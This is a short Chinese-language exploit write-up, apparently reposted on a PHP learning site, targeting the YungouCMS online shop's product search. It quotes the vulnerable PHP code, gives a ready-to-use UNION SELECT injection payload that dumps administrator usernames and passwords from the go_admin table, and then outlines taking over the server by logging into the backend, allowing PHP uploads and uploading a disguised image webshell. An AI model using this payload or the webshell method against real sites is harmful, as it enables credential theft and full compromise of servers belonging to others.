来源:自学PHP网 时间:2015-04-15 15:00 作者: 阅读:次
[导读] 官网 : http: www yungoucms com 演示站: http: www yungoucms cn 商品搜索可以构建SQL语句!http: www yungoucms cn ? s_tag public function tag(){$search =$this-segment(4);if(!$search)_messa...
|
官网 : http://www.yungoucms.com/ 演示站: http://www.yungoucms.cn/
商品搜索可以构建SQL语句!
http://www.yungoucms.cn/?/s_tag/
public function tag(){
$search =$this->segment(4);
if(!$search)_message("输入搜索关键字");
$search = urldecode($search);
$search = htmlspecialchars($search);
if(!_is_utf8($search)){
$search = iconv("GBK", "UTF-8", $search);
}
$mysql_model=System::load_sys_class(''model'');
$title=$search.'' - ''._cfg(''web_name'');
$shoplist=$mysql_model->GetList("select thumb,id,sid,zongrenshu,canyurenshu,shenyurenshu,money from `@#_shoplist` WHERE `title` LIKE ''%".$search."%''");
$list=count($shoplist);
include templates("search","search");
}
构建SQL语句
yun%%27 union select 1,2,3,group_concat(username),5,6,7 from go_admin%23
查看网页源文件就能得到用户信息 密码同样道理。
注入出来的账号密码藏入标签里面去了。查看就OK 。
拿到账号密码 至于后台拿shell 可以自己设置上传的类型
添加php后 不过要上传图片马才可以上去。
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
